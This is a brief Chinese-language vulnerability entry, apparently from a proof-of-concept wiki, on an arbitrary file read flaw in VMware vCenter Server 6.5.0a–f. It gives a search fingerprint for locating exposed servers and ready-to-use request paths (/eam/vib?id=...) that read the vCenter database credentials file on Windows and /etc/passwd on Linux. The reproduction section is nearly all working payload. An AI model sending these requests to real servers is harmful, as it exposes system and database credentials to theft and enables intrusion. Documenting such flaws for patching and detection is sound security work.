VMware vCenter vid 任意文件读取漏洞¶

漏洞描述¶

VMware vCenter特定版本存在任意文件读取漏洞，攻击者通过构造特定的请求，可以读取服务器上任意文件、

漏洞影响¶

VMware vCenter Server 6.5.0a- f 版本

网络测绘¶

title="ID_VC_Welcome"

漏洞复现¶

登录页面

Windows主机

/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

Linux主机

/eam/vib?id=/etc/passwd